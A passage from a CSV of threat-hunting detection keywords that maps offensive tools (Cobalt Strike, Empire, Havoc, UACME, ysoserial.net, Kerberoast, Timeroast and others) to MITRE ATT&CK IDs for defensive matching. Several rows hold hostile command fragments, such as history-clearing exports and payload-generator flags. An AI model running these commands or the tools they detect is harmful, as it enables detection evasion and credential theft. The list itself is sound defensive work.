Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins,T1199 - T1082 - T1210,TA0006 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/AonCyberLabs/Windows-Exploit-Suggester,1,1,N/A,N/A,10,3712,1016,2023-05-11T12:44:55Z,2014-07-08T13:16:28Z -*ExploitTest.cpp*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z -*ExploitTest.vcxproj*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z -*export HISTFILE=/dev/null*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*export HISTFILESIZE=0*,greyware_tool_keyword,bash,Clear command history in linux which is used for defense evasion. ,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*export HISTFILESIZE=0*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*export HISTFILESIZE=0*,greyware_tool_keyword,export,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*export HISTSIZE=0*,greyware_tool_keyword,export,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*export KRB5CCNAME=*.ccache*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,0,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*export KRB5CCNAME=/*/impacket/administrator.ccache* ,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*Export-PowerViewCSV*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Export-PowerViewCSV*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*exports --dll *.dll --prototypes ./Assets/prototypes.csv*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*exposed_get_password*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*exrienz/DirtyCow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/exrienz/DirtyCow,1,1,N/A,N/A,1,27,27,2018-07-23T02:07:24Z,2017-05-12T10:38:20Z -*extensions/sniffer*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*external_c2.cna*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2.*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2.dll*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2.Net*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*ExternalC2.Net.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*externalc2.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*ExternalC2\*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*externalc2_start*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2Core*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2-master*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2Tests*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2Web*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*external-nse-script-library*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*ExternalRecon.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*extract_cmd_exec*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*extract_cmd_exec*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*extract_reflective_loader*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ExtractBitLockerKeys*@podalirius_*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,0,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractBitlockerKeys.ps1*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractBitlockerKeys.py*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractBitlockerKeys-main*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractDataXML_BruteForce*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*extracttgsrepfrompcap.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*extra-scripts*timecrack.py*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*eyewitness -f urls.txt --web*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*-f BinaryFormatter -g PSObject -o base64 -c *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*-f Json.Net -g ObjectDataProvider -o raw -c *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*-f payloads_examples/calc.*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,0,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*f1zm0/acheron*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*f1zm0/hades*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*F3C62326-E221-4481-AC57-EF7F76AAF27B*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*f4081a8e30f75d46.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*F5BIG-Scanner.py*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jiansiting/CVE-2020-5902,1,0,N/A,N/A,1,6,5,2020-07-07T02:03:40Z,2020-07-07T02:03:39Z -*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*FA0DAF13-5058-4382-AE07-65E44AFB5592*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*Fadi002/unshackle*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - 